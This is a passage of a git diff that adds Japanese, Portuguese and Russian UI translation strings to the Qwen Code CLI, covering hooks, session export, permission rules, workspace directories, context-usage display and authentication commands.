'無効なフックを有効にする', + 'Disable an active hook': '有効なフックを無効にする', + + // ============================================================================ + // Commands - Session Export + // ============================================================================ + 'Export current session message history to a file': + '現在のセッションのメッセージ履歴をファイルにエクスポートする', + 'Export session to HTML format': 'セッションを HTML 形式でエクスポートする', + 'Export session to JSON format': 'セッションを JSON 形式でエクスポートする', + 'Export session to JSONL format (one message per line)': + 'セッションを JSONL 形式でエクスポートする(1 行に 1 メッセージ)', + 'Export session to markdown format': + 'セッションを Markdown 形式でエクスポートする', + + // ============================================================================ + // Commands - Insights + // ============================================================================ + 'generate personalized programming insights from your chat history': + 'チャット履歴からパーソナライズされたプログラミングインサイトを生成する', + + // ============================================================================ + // Commands - Session History + // ============================================================================ + 'Resume a previous session': '前のセッションを再開する', + 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested': + 'ツール呼び出しを復元します。これにより、会話とファイルの履歴はそのツール呼び出しが提案された時点の状態に戻ります', 'Could not detect terminal type. Supported terminals: VS Code, Cursor, Windsurf, and Trae.': 'ターミナルの種類を検出できませんでした。サポートされているターミナル: VS Code、Cursor、Windsurf、Trae', 'Terminal "{{terminal}}" is not supported yet.': @@ -751,6 +785,8 @@ export default { 'No, suggest changes (esc)': 'いいえ、変更を提案 (Esc)', "Allow execution of: '{{command}}'?": "'{{command}}' の実行を許可しますか?", 'Yes, allow always ...': 'はい、常に許可...', + 'Always allow in this project': 'このプロジェクトで常に許可', + 'Always allow for this user': 'このユーザーに常に許可', 'Yes, and auto-accept edits': 'はい、編集を自動承認', 'Yes, and manually approve edits': 'はい、編集を手動承認', 'No, keep planning (esc)': 'いいえ、計画を続ける (Esc)', @@ -871,6 +907,73 @@ export default { 'Alibaba Cloud ModelStudioの最新Qwen Visionモデル(バージョン: qwen3-vl-plus-2025-09-23)', // Dialogs - Permissions 'Manage folder trust settings': 'フォルダ信頼設定を管理', + 'Manage permission rules': '権限ルールを管理', + Allow: '許可', + Ask: '確認', + Deny: '拒否', + Workspace: 'ワークスペース', + "Qwen Code won't ask before using allowed tools.": + 'Qwen Code は許可されたツールを使用する前に確認しません。', + 'Qwen Code will ask before using these tools.': + 'Qwen Code はこれらのツールを使用する前に確認します。', + 'Qwen Code is not allowed to use denied tools.': + 'Qwen Code は拒否されたツールを使用できません。', + 'Manage trusted directories for this workspace.': + 'このワークスペースの信頼済みディレクトリを管理します。', + 'Any use of the {{tool}} tool': '{{tool}} ツールのすべての使用', + "{{tool}} commands matching '{{pattern}}'": + "'{{pattern}}' に一致する {{tool}} コマンド", + 'From user settings': 'ユーザー設定から', + 'From project settings': 'プロジェクト設定から', + 'From session': 'セッションから', + 'Project settings (local)': 'プロジェクト設定(ローカル)', + 'Saved in .qwen/settings.local.json': '.qwen/settings.local.json に保存', + 'Project settings': 'プロジェクト設定', + 'Checked in at .qwen/settings.json': '.qwen/settings.json にチェックイン', + 'User settings': 'ユーザー設定', + 'Saved in at ~/.qwen/settings.json': '~/.qwen/settings.json に保存', + 'Add a new rule…': '新しいルールを追加…', + 'Add {{type}} permission rule': '{{type}}権限ルールを追加', + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.': + '権限ルールはツール名で、オプションで括弧内に指定子を付けます。', + 'e.g.,': '例:', + or: 'または', + 'Enter permission rule…': '権限ルールを入力…', + 'Enter to submit · Esc to cancel': 'Enter で送信 · Esc でキャンセル', + 'Where should this rule be saved?': 'このルールをどこに保存しますか?', + 'Enter to confirm · Esc to cancel': 'Enter で確認 · Esc でキャンセル', + 'Delete {{type}} rule?': '{{type}}ルールを削除しますか?', + 'Are you sure you want to delete this permission rule?': + 'この権限ルールを削除してもよろしいですか?', + 'Permissions:': '権限:', + '(←/→ or tab to cycle)': '(←/→ または Tab で切替)', + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel': + '↑↓ でナビゲート · Enter で選択 · 入力で検索 · Esc でキャンセル', + 'Search…': '検索…', + 'Use /trust to manage folder trust settings for this workspace.': + '/trust を使用してこのワークスペースのフォルダ信頼設定を管理します。', + // Workspace directory management + 'Add directory…': 'ディレクトリを追加…', + 'Add directory to workspace': 'ワークスペースにディレクトリを追加', + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.': + 'Qwen Code はワークスペース内のファイルを読み取り、自動編集承認が有効な場合は編集を行えます。', + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits is on.': + 'Qwen Code はこのディレクトリ内のファイルを読み取り、自動編集承認が有効な場合は編集を行えます。', + 'Enter the path to the directory:': 'ディレクトリのパスを入力してください:', + 'Enter directory path…': 'ディレクトリパスを入力…', + 'Tab to complete · Enter to add · Esc to cancel': + 'Tab で補完 · Enter で追加 · Esc でキャンセル', + 'Remove directory?': 'ディレクトリを削除しますか?', + 'Are you sure you want to remove this directory from the workspace?': + 'このディレクトリをワークスペースから削除してもよろしいですか?', + ' (Original working directory)': ' (元の作業ディレクトリ)', + ' (from settings)': ' (設定より)', + 'Directory does not exist.': 'ディレクトリが存在しません。', + 'Path is not a directory.': 'パスはディレクトリではありません。', + 'This directory is already in the workspace.': + 'このディレクトリはすでにワークスペースに含まれています。', + 'Already covered by existing directory: {{dir}}': + '既存のディレクトリによって既にカバーされています: {{dir}}', // Status Bar 'Using:': '使用中:', '{{count}} open file': '{{count}} 個のファイルを開いています', @@ -1092,6 +1195,35 @@ export default { '{{region}} の新しいモデル設定が利用可能です。今すぐ更新しますか?', '{{region}} configuration updated successfully. Model switched to "{{model}}".': '{{region}} の設定が正常に更新されました。モデルが "{{model}}" に切り替わりました。', + 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json (backed up).': + '{{region}} での認証に成功しました。API キーとモデル設定が settings.json に保存されました(バックアップ済み)。', + + // ============================================================================ + // Context Usage Component + // ============================================================================ + 'Context Usage': 'コンテキスト使用量', + 'No API response yet. Send a message to see actual usage.': + 'API応答はありません。メッセージを送信して実際の使用量を確認してください。', + 'Estimated pre-conversation overhead': '推定事前会話オーバーヘッド', + 'Context window': 'コンテキストウィンドウ', + tokens: 'トークン', + Used: '使用済み', + Free: '空き', + 'Autocompact buffer': '自動圧縮バッファ', + 'Usage by category': 'カテゴリ別の使用量', + 'System prompt': 'システムプロンプト', + 'Built-in tools': '組み込みツール', + 'MCP tools': 'MCPツール', + 'Memory files': 'メモリファイル', + Skills: 'スキル', + Messages: 'メッセージ', + 'Show context window usage breakdown.': + 'コンテキストウィンドウの使用状況を表示します。', + 'Run /context detail for per-item breakdown.': + '/context detail を実行すると項目ごとの内訳を表示します。', + active: '有効', + 'body loaded': '本文読み込み済み', + memory: 'メモリ', '{{region}} configuration updated successfully.': '{{region}} の設定が正常に更新されました。', 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json.': @@ -1125,4 +1257,76 @@ export default { '↑/↓: ナビゲート | Space/Enter: 切り替え | Esc: キャンセル', '↑/↓: Navigate | Enter: Select | Esc: Cancel': '↑/↓: ナビゲート | Enter: 選択 | Esc: キャンセル', + + // ============================================================================ + // Commands - Auth + // ============================================================================ + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan': + 'Qwen-OAuth または Alibaba Cloud Coding Plan で Qwen 認証情報を設定する', + 'Authenticate using Qwen OAuth': 'Qwen OAuth で認証する', + 'Authenticate using Alibaba Cloud Coding Plan': + 'Alibaba Cloud Coding Plan で認証する', + 'Region for Coding Plan (china/global)': + 'Coding Plan のリージョン (china/global)', + 'API key for Coding Plan': 'Coding Plan の API キー', + 'Show current authentication status': '現在の認証ステータスを表示', + 'Authentication completed successfully.': '認証が正常に完了しました。', + 'Starting Qwen OAuth authentication...': 'Qwen OAuth 認証を開始しています...', + 'Successfully authenticated with Qwen OAuth.': + 'Qwen OAuth での認証に成功しました。', + 'Failed to authenticate with Qwen OAuth: {{error}}': + 'Qwen OAuth での認証に失敗しました: {{error}}', + 'Processing Alibaba Cloud Coding Plan authentication...': + 'Alibaba Cloud Coding Plan 認証を処理しています...', + 'Successfully authenticated with Alibaba Cloud Coding Plan.': + 'Alibaba Cloud Coding Plan での認証に成功しました。', + 'Failed to authenticate with Coding Plan: {{error}}': + 'Coding Plan での認証に失敗しました: {{error}}', + '中国 (China)': '中国 (China)', + '阿里云百炼 (aliyun.com)': '阿里云百炼 (aliyun.com)', + Global: 'グローバル', + 'Alibaba Cloud (alibabacloud.com)': 'Alibaba Cloud (alibabacloud.com)', + 'Select region for Coding Plan:': 'Coding Plan のリージョンを選択:', + 'Enter your Coding Plan API key: ': + 'Coding Plan の API キーを入力してください: ', + 'Select authentication method:': '認証方法を選択:', + '\n=== Authentication Status ===\n': '\n=== 認証ステータス ===\n', + '⚠️ No authentication method configured.\n': + '⚠️ 認証方法が設定されていません。\n', + 'Run one of the following commands to get started:\n': + '以下のコマンドのいずれかを実行して開始してください:\n', + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)': + ' qwen auth qwen-oauth - Qwen OAuth で認証(無料)', + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding Plan\n': + ' qwen auth coding-plan - Alibaba Cloud Coding Plan で認証\n', + 'Or simply run:': 'または以下を実行:', + ' qwen auth - Interactive authentication setup\n': + ' qwen auth - インタラクティブ認証セットアップ\n', + '✓ Authentication Method: Qwen OAuth': '✓ 認証方法: Qwen OAuth', + ' Type: Free tier': ' タイプ: 無料プラン', + ' Limit: Up to 1,000 requests/day': ' 制限: 1日最大1,000リクエスト', + ' Models: Qwen latest models\n': ' モデル: Qwen 最新モデル\n', + '✓ Authentication Method: Alibaba Cloud Coding Plan': + '✓ 認証方法: Alibaba Cloud Coding Plan', + '中国 (China) - 阿里云百炼': '中国 (China) - 阿里云百炼', + 'Global - Alibaba Cloud': 'グローバル - Alibaba Cloud', + ' Region: {{region}}': ' リージョン: {{region}}', + ' Current Model: {{model}}': ' 現在のモデル: {{model}}', + ' Config Version: {{version}}': ' 設定バージョン: {{version}}', + ' Status: API key configured\n': ' ステータス: APIキー設定済み\n', + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)': + '⚠️ 認証方法: Alibaba Cloud Coding Plan(不完全)', + ' Issue: API key not found in environment or settings\n': + ' 問題: 環境変数または設定にAPIキーが見つかりません\n', + ' Run `qwen auth coding-plan` to re-configure.\n': + ' `qwen auth coding-plan` を実行して再設定してください。\n', + '✓ Authentication Method: {{type}}': '✓ 認証方法: {{type}}', + ' Status: Configured\n': ' ステータス: 設定済み\n', + 'Failed to check authentication status: {{error}}': + '認証ステータスの確認に失敗しました: {{error}}', + 'Select an option:': 'オプションを選択:', + 'Raw mode not available. Please run in an interactive terminal.': + 'Rawモードが利用できません。インタラクティブターミナルで実行してください。', + '(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n': + '(↑ ↓ 矢印キーで移動、Enter で選択、Ctrl+C で終了)\n', }; diff --git a/packages/cli/src/i18n/locales/pt.js b/packages/cli/src/i18n/locales/pt.js index 7492fe5f4..b2240877b 100644 --- a/packages/cli/src/i18n/locales/pt.js +++ b/packages/cli/src/i18n/locales/pt.js @@ -111,6 +111,7 @@ export default { 'Analisa o projeto e cria um arquivo QWEN.md personalizado.', 'List available Qwen Code tools. Usage: /tools [desc]': 'Listar ferramentas Qwen Code disponíveis. Uso: /tools [desc]', + 'List available skills.': 'Listar habilidades disponíveis.', 'Available Qwen Code CLI tools:': 'Ferramentas CLI do Qwen Code disponíveis:', 'No tools available': 'Nenhuma ferramenta disponível', 'View or change the approval mode for tool usage': @@ -401,6 +402,7 @@ export default { 'Estes editores são suportados atualmente. Note que alguns editores não podem ser usados no modo sandbox.', 'Your preferred editor is:': 'Seu editor preferido é:', 'Manage extensions': 'Gerenciar extensões', + 'Manage installed extensions': 'Gerenciar extensões instaladas', 'List active extensions': 'Listar extensões ativas', 'Update extensions. Usage: update |--all': 'Atualizar extensões. Uso: update |--all', @@ -590,6 +592,38 @@ export default { 'Falha ao configurar {{terminalName}}.', 'Your terminal is already configured for an optimal experience with multiline input (Shift+Enter and Ctrl+Enter).': 'Seu terminal já está configurado para uma experiência ideal com entrada multilinhas (Shift+Enter e Ctrl+Enter).', + // ============================================================================ + // Commands - Hooks + // ============================================================================ + 'Manage Qwen Code hooks': 'Gerenciar hooks do Qwen Code', + 'List all configured hooks': 'Listar todos os hooks configurados', + 'Enable a disabled hook': 'Ativar um hook desativado', + 'Disable an active hook': 'Desativar um hook ativo', + + // ============================================================================ + // Commands - Session Export + // ============================================================================ + 'Export current session message history to a file': + 'Exportar o histórico de mensagens da sessão atual para um arquivo', + 'Export session to HTML format': 'Exportar a sessão para o formato HTML', + 'Export session to JSON format': 'Exportar a sessão para o formato JSON', + 'Export session to JSONL format (one message per line)': + 'Exportar a sessão para o formato JSONL (uma mensagem por linha)', + 'Export session to markdown format': + 'Exportar a sessão para o formato Markdown', + + // ============================================================================ + // Commands - Insights + // ============================================================================ + 'generate personalized programming insights from your chat history': + 'Gerar insights personalizados de programação a partir do seu histórico de chat', + + // ============================================================================ + // Commands - Session History + // ============================================================================ + 'Resume a previous session': 'Retomar uma sessão anterior', + 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested': + 'Restaurar uma chamada de ferramenta. Isso redefinirá o histórico da conversa e dos arquivos para o estado em que a chamada da ferramenta foi sugerida', 'Could not detect terminal type. Supported terminals: VS Code, Cursor, Windsurf, and Trae.': 'Não foi possível detectar o tipo de terminal. Terminais suportados: VS Code, Cursor, Windsurf e Trae.', 'Terminal "{{terminal}}" is not supported yet.': @@ -1019,6 +1053,8 @@ export default { "Allow execution of: '{{command}}'?": "Permitir a execução de: '{{command}}'?", 'Yes, allow always ...': 'Sim, permitir sempre ...', + 'Always allow in this project': 'Sempre permitir neste projeto', + 'Always allow for this user': 'Sempre permitir para este usuário', 'Yes, and auto-accept edits': 'Sim, e aceitar edições automaticamente', 'Yes, and manually approve edits': 'Sim, e aprovar edições manualmente', 'No, keep planning (esc)': 'Não, continuar planejando (esc)', @@ -1185,6 +1221,74 @@ export default { // ============================================================================ 'Manage folder trust settings': 'Gerenciar configurações de confiança de pasta', + 'Manage permission rules': 'Gerenciar regras de permissão', + Allow: 'Permitir', + Ask: 'Perguntar', + Deny: 'Negar', + Workspace: 'Área de trabalho', + "Qwen Code won't ask before using allowed tools.": + 'O Qwen Code não perguntará antes de usar ferramentas permitidas.', + 'Qwen Code will ask before using these tools.': + 'O Qwen Code perguntará antes de usar essas ferramentas.', + 'Qwen Code is not allowed to use denied tools.': + 'O Qwen Code não tem permissão para usar ferramentas negadas.', + 'Manage trusted directories for this workspace.': + 'Gerenciar diretórios confiáveis para esta área de trabalho.', + 'Any use of the {{tool}} tool': 'Qualquer uso da ferramenta {{tool}}', + "{{tool}} commands matching '{{pattern}}'": + "Comandos {{tool}} correspondentes a '{{pattern}}'", + 'From user settings': 'Das configurações do usuário', + 'From project settings': 'Das configurações do projeto', + 'From session': 'Da sessão', + 'Project settings (local)': 'Configurações do projeto (local)', + 'Saved in .qwen/settings.local.json': 'Salvo em .qwen/settings.local.json', + 'Project settings': 'Configurações do projeto', + 'Checked in at .qwen/settings.json': 'Registrado em .qwen/settings.json', + 'User settings': 'Configurações do usuário', + 'Saved in at ~/.qwen/settings.json': 'Salvo em ~/.qwen/settings.json', + 'Add a new rule…': 'Adicionar nova regra…', + 'Add {{type}} permission rule': 'Adicionar regra de permissão {{type}}', + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.': + 'Regras de permissão são um nome de ferramenta, opcionalmente seguido por um especificador entre parênteses.', + 'e.g.,': 'ex.', + or: 'ou', + 'Enter permission rule…': 'Insira a regra de permissão…', + 'Enter to submit · Esc to cancel': 'Enter para enviar · Esc para cancelar', + 'Where should this rule be saved?': 'Onde esta regra deve ser salva?', + 'Enter to confirm · Esc to cancel': + 'Enter para confirmar · Esc para cancelar', + 'Delete {{type}} rule?': 'Excluir regra {{type}}?', + 'Are you sure you want to delete this permission rule?': + 'Tem certeza de que deseja excluir esta regra de permissão?', + 'Permissions:': 'Permissões:', + '(←/→ or tab to cycle)': '(←/→ ou Tab para alternar)', + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel': + '↑↓ para navegar · Enter para selecionar · Digite para pesquisar · Esc para cancelar', + 'Search…': 'Pesquisar…', + 'Use /trust to manage folder trust settings for this workspace.': + 'Use /trust para gerenciar as configurações de confiança de pasta desta área de trabalho.', + // Workspace directory management + 'Add directory…': 'Adicionar diretório…', + 'Add directory to workspace': 'Adicionar diretório à área de trabalho', + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.': + 'O Qwen Code pode ler arquivos na área de trabalho e fazer edições quando a aceitação automática está ativada.', + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits is on.': + 'O Qwen Code poderá ler arquivos neste diretório e fazer edições quando a aceitação automática está ativada.', + 'Enter the path to the directory:': 'Insira o caminho do diretório:', + 'Enter directory path…': 'Insira o caminho do diretório…', + 'Tab to complete · Enter to add · Esc to cancel': + 'Tab para completar · Enter para adicionar · Esc para cancelar', + 'Remove directory?': 'Remover diretório?', + 'Are you sure you want to remove this directory from the workspace?': + 'Tem certeza de que deseja remover este diretório da área de trabalho?', + ' (Original working directory)': ' (Diretório de trabalho original)', + ' (from settings)': ' (das configurações)', + 'Directory does not exist.': 'O diretório não existe.', + 'Path is not a directory.': 'O caminho não é um diretório.', + 'This directory is already in the workspace.': + 'Este diretório já está na área de trabalho.', + 'Already covered by existing directory: {{dir}}': + 'Já coberto pelo diretório existente: {{dir}}', // ============================================================================ // Status Bar @@ -1581,6 +1685,35 @@ export default { 'Novas configurações de modelo estão disponíveis para o {{region}}. Atualizar agora?', '{{region}} configuration updated successfully. Model switched to "{{model}}".': 'Configuração do {{region}} atualizada com sucesso. Modelo alterado para "{{model}}".', + 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json (backed up).': + 'Autenticado com sucesso com {{region}}. Chave de API e configurações de modelo salvas em settings.json (com backup).', + + // ============================================================================ + // Context Usage Component + // ============================================================================ + 'Context Usage': 'Uso do Contexto', + 'No API response yet. Send a message to see actual usage.': + 'Ainda não há resposta da API. Envie uma mensagem para ver o uso real.', + 'Estimated pre-conversation overhead': 'Sobrecarga estimada pré-conversa', + 'Context window': 'Janela de Contexto', + tokens: 'tokens', + Used: 'Usado', + Free: 'Livre', + 'Autocompact buffer': 'Buffer de autocompactação', + 'Usage by category': 'Uso por categoria', + 'System prompt': 'Prompt do sistema', + 'Built-in tools': 'Ferramentas integradas', + 'MCP tools': 'Ferramentas MCP', + 'Memory files': 'Arquivos de memória', + Skills: 'Habilidades', + Messages: 'Mensagens', + 'Show context window usage breakdown.': + 'Exibe a divisão de uso da janela de contexto.', + 'Run /context detail for per-item breakdown.': + 'Execute /context detail para detalhamento por item.', + active: 'ativo', + 'body loaded': 'conteúdo carregado', + memory: 'memória', '{{region}} configuration updated successfully.': 'Configuração do {{region}} atualizada com sucesso.', 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json.': @@ -1616,4 +1749,78 @@ export default { '↑/↓: Navegar | Space/Enter: Alternar | Esc: Cancelar', '↑/↓: Navigate | Enter: Select | Esc: Cancel': '↑/↓: Navegar | Enter: Selecionar | Esc: Cancelar', + + // ============================================================================ + // Commands - Auth + // ============================================================================ + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan': + 'Configurar autenticação Qwen com Qwen-OAuth ou Alibaba Cloud Coding Plan', + 'Authenticate using Qwen OAuth': 'Autenticar usando Qwen OAuth', + 'Authenticate using Alibaba Cloud Coding Plan': + 'Autenticar usando Alibaba Cloud Coding Plan', + 'Region for Coding Plan (china/global)': + 'Região para Coding Plan (china/global)', + 'API key for Coding Plan': 'Chave de API para Coding Plan', + 'Show current authentication status': 'Mostrar status atual de autenticação', + 'Authentication completed successfully.': + 'Autenticação concluída com sucesso.', + 'Starting Qwen OAuth authentication...': + 'Iniciando autenticação Qwen OAuth...', + 'Successfully authenticated with Qwen OAuth.': + 'Autenticado com sucesso via Qwen OAuth.', + 'Failed to authenticate with Qwen OAuth: {{error}}': + 'Falha ao autenticar com Qwen OAuth: {{error}}', + 'Processing Alibaba Cloud Coding Plan authentication...': + 'Processando autenticação Alibaba Cloud Coding Plan...', + 'Successfully authenticated with Alibaba Cloud Coding Plan.': + 'Autenticado com sucesso via Alibaba Cloud Coding Plan.', + 'Failed to authenticate with Coding Plan: {{error}}': + 'Falha ao autenticar com Coding Plan: {{error}}', + '中国 (China)': '中国 (China)', + '阿里云百炼 (aliyun.com)': '阿里云百炼 (aliyun.com)', + Global: 'Global', + 'Alibaba Cloud (alibabacloud.com)': 'Alibaba Cloud (alibabacloud.com)', + 'Select region for Coding Plan:': 'Selecione a região para Coding Plan:', + 'Enter your Coding Plan API key: ': + 'Insira sua chave de API do Coding Plan: ', + 'Select authentication method:': 'Selecione o método de autenticação:', + '\n=== Authentication Status ===\n': '\n=== Status de Autenticação ===\n', + '⚠️ No authentication method configured.\n': + '⚠️ Nenhum método de autenticação configurado.\n', + 'Run one of the following commands to get started:\n': + 'Execute um dos seguintes comandos para começar:\n', + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)': + ' qwen auth qwen-oauth - Autenticar com Qwen OAuth (gratuito)', + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding Plan\n': + ' qwen auth coding-plan - Autenticar com Alibaba Cloud Coding Plan\n', + 'Or simply run:': 'Ou simplesmente execute:', + ' qwen auth - Interactive authentication setup\n': + ' qwen auth - Configuração interativa de autenticação\n', + '✓ Authentication Method: Qwen OAuth': '✓ Método de autenticação: Qwen OAuth', + ' Type: Free tier': ' Tipo: Gratuito', + ' Limit: Up to 1,000 requests/day': ' Limite: Até 1.000 solicitações/dia', + ' Models: Qwen latest models\n': ' Modelos: Modelos Qwen mais recentes\n', + '✓ Authentication Method: Alibaba Cloud Coding Plan': + '✓ Método de autenticação: Alibaba Cloud Coding Plan', + '中国 (China) - 阿里云百炼': '中国 (China) - 阿里云百炼', + 'Global - Alibaba Cloud': 'Global - Alibaba Cloud', + ' Region: {{region}}': ' Região: {{region}}', + ' Current Model: {{model}}': ' Modelo atual: {{model}}', + ' Config Version: {{version}}': ' Versão da configuração: {{version}}', + ' Status: API key configured\n': ' Status: Chave de API configurada\n', + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)': + '⚠️ Método de autenticação: Alibaba Cloud Coding Plan (Incompleto)', + ' Issue: API key not found in environment or settings\n': + ' Problema: Chave de API não encontrada no ambiente ou configurações\n', + ' Run `qwen auth coding-plan` to re-configure.\n': + ' Execute `qwen auth coding-plan` para reconfigurar.\n', + '✓ Authentication Method: {{type}}': '✓ Método de autenticação: {{type}}', + ' Status: Configured\n': ' Status: Configurado\n', + 'Failed to check authentication status: {{error}}': + 'Falha ao verificar status de autenticação: {{error}}', + 'Select an option:': 'Selecione uma opção:', + 'Raw mode not available. Please run in an interactive terminal.': + 'Modo raw não disponível. Execute em um terminal interativo.', + '(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n': + '(Use ↑ ↓ para navegar, Enter para selecionar, Ctrl+C para sair)\n', }; diff --git a/packages/cli/src/i18n/locales/ru.js b/packages/cli/src/i18n/locales/ru.js index 66cf2791d..c3ae5953a 100644 --- a/packages/cli/src/i18n/locales/ru.js +++ b/packages/cli/src/i18n/locales/ru.js @@ -119,6 +119,7 @@ export default { 'Анализ проекта и создание адаптированного файла QWEN.md', 'List available Qwen Code tools. Usage: /tools [desc]': 'Просмотр доступных инструментов Qwen Code. Использование: /tools [desc]', + 'List available skills.': 'Показать доступные навыки.', 'Available Qwen Code CLI tools:': 'Доступные инструменты Qwen Code CLI:', 'No tools available': 'Нет доступных инструментов', 'View or change the approval mode for tool usage': @@ -398,6 +399,7 @@ export default { 'В настоящее время поддерживаются следующие редакторы. Обратите внимание, что некоторые редакторы нельзя использовать в режиме песочницы.', 'Your preferred editor is:': 'Ваш предпочитаемый редактор:', 'Manage extensions': 'Управление расширениями', + 'Manage installed extensions': 'Управлять установленными расширениями', 'List active extensions': 'Показать активные расширения', 'Update extensions. Usage: update |--all': 'Обновить расширения. Использование: update |--all', @@ -596,6 +598,38 @@ export default { 'Не удалось настроить {{terminalName}}.', 'Your terminal is already configured for an optimal experience with multiline input (Shift+Enter and Ctrl+Enter).': 'Ваш терминал уже настроен для оптимальной работы с многострочным вводом (Shift+Enter и Ctrl+Enter).', + // ============================================================================ + // Commands - Hooks + // ============================================================================ + 'Manage Qwen Code hooks': 'Управлять хуками Qwen Code', + 'List all configured hooks': 'Показать все настроенные хуки', + 'Enable a disabled hook': 'Включить отключенный хук', + 'Disable an active hook': 'Отключить активный хук', + + // ============================================================================ + // Commands - Session Export + // ============================================================================ + 'Export current session message history to a file': + 'Экспортировать историю сообщений текущей сессии в файл', + 'Export session to HTML format': 'Экспортировать сессию в формат HTML', + 'Export session to JSON format': 'Экспортировать сессию в формат JSON', + 'Export session to JSONL format (one message per line)': + 'Экспортировать сессию в формат JSONL (одно сообщение на строку)', + 'Export session to markdown format': + 'Экспортировать сессию в формат Markdown', + + // ============================================================================ + // Commands - Insights + // ============================================================================ + 'generate personalized programming insights from your chat history': + 'Создать персонализированные инсайты по программированию на основе истории чата', + + // ============================================================================ + // Commands - Session History + // ============================================================================ + 'Resume a previous session': 'Продолжить предыдущую сессию', + 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested': + 'Восстановить вызов инструмента. Это вернет историю разговора и файлов к состоянию на момент, когда был предложен этот вызов инструмента', 'Could not detect terminal type. Supported terminals: VS Code, Cursor, Windsurf, and Trae.': 'Не удалось определить тип терминала. Поддерживаемые терминалы: VS Code, Cursor, Windsurf и Trae.', 'Terminal "{{terminal}}" is not supported yet.': @@ -944,6 +978,8 @@ export default { 'No, suggest changes (esc)': 'Нет, предложить изменения (esc)', "Allow execution of: '{{command}}'?": "Разрешить выполнение: '{{command}}'?", 'Yes, allow always ...': 'Да, всегда разрешать ...', + 'Always allow in this project': 'Всегда разрешать в этом проекте', + 'Always allow for this user': 'Всегда разрешать для этого пользователя', 'Yes, and auto-accept edits': 'Да, и автоматически принимать правки', 'Yes, and manually approve edits': 'Да, и вручную подтверждать правки', 'No, keep planning (esc)': 'Нет, продолжить планирование (esc)', @@ -1108,6 +1144,74 @@ export default { // Диалоги - Разрешения // ============================================================================ 'Manage folder trust settings': 'Управление настройками доверия к папкам', + 'Manage permission rules': 'Управление правилами разрешений', + Allow: 'Разрешить', + Ask: 'Спросить', + Deny: 'Запретить', + Workspace: 'Рабочая область', + "Qwen Code won't ask before using allowed tools.": + 'Qwen Code не будет спрашивать перед использованием разрешённых инструментов.', + 'Qwen Code will ask before using these tools.': + 'Qwen Code спросит перед использованием этих инструментов.', + 'Qwen Code is not allowed to use denied tools.': + 'Qwen Code не может использовать запрещённые инструменты.', + 'Manage trusted directories for this workspace.': + 'Управление доверенными каталогами для этой рабочей области.', + 'Any use of the {{tool}} tool': 'Любое использование инструмента {{tool}}', + "{{tool}} commands matching '{{pattern}}'": + "Команды {{tool}}, соответствующие '{{pattern}}'", + 'From user settings': 'Из пользовательских настроек', + 'From project settings': 'Из настроек проекта', + 'From session': 'Из сессии', + 'Project settings (local)': 'Настройки проекта (локальные)', + 'Saved in .qwen/settings.local.json': 'Сохранено в .qwen/settings.local.json', + 'Project settings': 'Настройки проекта', + 'Checked in at .qwen/settings.json': 'Зафиксировано в .qwen/settings.json', + 'User settings': 'Пользовательские настройки', + 'Saved in at ~/.qwen/settings.json': 'Сохранено в ~/.qwen/settings.json', + 'Add a new rule…': 'Добавить новое правило…', + 'Add {{type}} permission rule': 'Добавить правило разрешения {{type}}', + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.': + 'Правила разрешений — это имя инструмента, за которым может следовать спецификатор в скобках.', + 'e.g.,': 'напр.', + or: 'или', + 'Enter permission rule…': 'Введите правило разрешения…', + 'Enter to submit · Esc to cancel': 'Enter для отправки · Esc для отмены', + 'Where should this rule be saved?': 'Где сохранить это правило?', + 'Enter to confirm · Esc to cancel': + 'Enter для подтверждения · Esc для отмены', + 'Delete {{type}} rule?': 'Удалить правило {{type}}?', + 'Are you sure you want to delete this permission rule?': + 'Вы уверены, что хотите удалить это правило разрешения?', + 'Permissions:': 'Разрешения:', + '(←/→ or tab to cycle)': '(←/→ или Tab для переключения)', + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel': + '↑↓ навигация · Enter выбор · Ввод для поиска · Esc отмена', + 'Search…': 'Поиск…', + 'Use /trust to manage folder trust settings for this workspace.': + 'Используйте /trust для управления настройками доверия к папкам этой рабочей области.', + // Workspace directory management + 'Add directory…': 'Добавить каталог…', + 'Add directory to workspace': 'Добавить каталог в рабочую область', + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.': + 'Qwen Code может читать файлы в рабочей области и вносить правки, когда автоприём правок включён.', + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits is on.': + 'Qwen Code сможет читать файлы в этом каталоге и вносить правки, когда автоприём правок включён.', + 'Enter the path to the directory:': 'Введите путь к каталогу:', + 'Enter directory path…': 'Введите путь к каталогу…', + 'Tab to complete · Enter to add · Esc to cancel': + 'Tab для завершения · Enter для добавления · Esc для отмены', + 'Remove directory?': 'Удалить каталог?', + 'Are you sure you want to remove this directory from the workspace?': + 'Вы уверены, что хотите удалить этот каталог из рабочей области?', + ' (Original working directory)': ' (Исходный рабочий каталог)', + ' (from settings)': ' (из настроек)', + 'Directory does not exist.': 'Каталог не существует.', + 'Path is not a directory.': 'Путь не является каталогом.', + 'This directory is already in the workspace.': + 'Этот каталог уже есть в рабочей области.', + 'Already covered by existing directory: 